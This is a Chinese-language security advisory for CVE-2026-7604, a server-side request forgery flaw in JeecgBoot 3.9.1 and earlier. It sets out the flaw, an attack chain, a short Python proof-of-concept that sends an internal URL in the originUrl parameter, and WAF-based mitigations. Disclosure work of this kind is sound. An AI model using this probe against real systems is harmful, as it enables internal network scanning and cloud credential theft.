CVE-2026-7604 JeecgBoot SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-7604

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JeecgBoot

漏洞概述

JeecgBoot在3.9.1及之前版本中存在严重的安全漏洞。该漏洞位于OpenApi服务的OpenApiController.java文件中，影响add和call函数。攻击者可以通过操纵originUrl参数，诱导服务器向任意地址发起请求，造成服务器端请求伪造（SSRF）。由于该漏洞允许远程利用且无需用户交互，攻击者可能借此探测内网拓扑或访问敏感资源。厂商已确认该问题，建议用户尽快关注官方更新。

技术细节

该漏洞的核心在于JeecgBoot框架对于OpenApi组件中`originUrl`参数的过滤机制缺失。在`OpenApiController`的`add`和`call`方法中，程序直接接收用户传入的`originUrl`参数，并使用该参数构造服务器端的HTTP请求，而未验证目标地址是否合法或属于内网地址。根据CVSS 3.1评分向量（AV:N/AC:L/PR:L/UI:N/S:U），攻击者需要低权限（PR:L）即可利用此漏洞，这意味着拥有基本账户的用户即可发起攻击。由于攻击复杂度低且无需用户交互，攻击者可以构造恶意链接，使服务器向内部网络（如127.0.0.1、10.0.0.0/8等）发送请求。这种SSRF攻击不仅可能导致敏感的内网服务信息泄露（如端口扫描、敏感文件读取），在特定云环境下，还可能利用云元数据服务窃取临时凭证，进而接管云服务器。鉴于目前已有公开的PoC代码，该漏洞的利用门槛极低，风险不可忽视。

攻击链分析

STEP 1

侦察

攻击者确定目标系统运行的是JeecgBoot框架，且版本在3.9.1及以下。

STEP 2

漏洞利用

攻击者利用低权限账户向`/jeecg-boot/open/api/add`或`/call`接口发送POST请求，在`originUrl`参数中填入内网地址（如127.0.0.1）。

STEP 3

SSRF执行

服务器端接收请求后，直接使用`originUrl`的值作为目标发起HTTP请求，导致服务器向内网资源发起连接。

STEP 4

信息收集

攻击者根据响应时间或返回内容，判断内网端口开放情况或获取敏感服务的数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2026-7604 PoC for JeecgBoot SSRF
# Target configuration
target = "http://127.0.0.1:8080"
endpoint = "/jeecg-boot/open/api/add"

# Malicious internal URL to scan (e.g., local admin panel)
malicious_url = "http://127.0.0.1:22" 

headers = {
    "Content-Type": "application/json",
    "User-Agent": "CVE-2026-7604-Scanner"
}

# Payload structure based on vulnerable parameter 'originUrl'
payload = {
    "originUrl": malicious_url,
    # Note: Depending on the specific API version, other fields might be required.
    # This demonstrates the core vulnerability exploitation.
}

try:
    response = requests.post(target + endpoint, data=json.dumps(payload), headers=headers, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check response for timing differences indicating internal access.")
        print("Response:", response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error occurred: {e}")

影响范围

JeecgBoot <= 3.9.1

防御指南

临时缓解措施

若无法立即升级，建议通过WAF（Web应用防火墙）添加规则，拦截对`/open/api/`路径下请求中包含内网IP（如127.0.0.1, 192.168.x.x, 10.x.x.x等）的`originUrl`参数。同时，应暂时禁用OpenApi Service组件或严格限制该接口的访问IP白名单。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7604
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7604
3 Details https://www.cvedetails.com/cve/CVE-2026-7604/
4 VulDB https://vuldb.com/cve/CVE-2026-7604
5 Link https://github.com/jeecgboot/JeecgBoot/
6 Link https://github.com/jeecgboot/JeecgBoot/issues/9554
7 Link https://github.com/jeecgboot/JeecgBoot/issues/9554#issuecomment-4251574151
8 Link https://vuldb.com/submit/805708
9 Link https://vuldb.com/vuln/360561
10 Link https://vuldb.com/vuln/360561/cti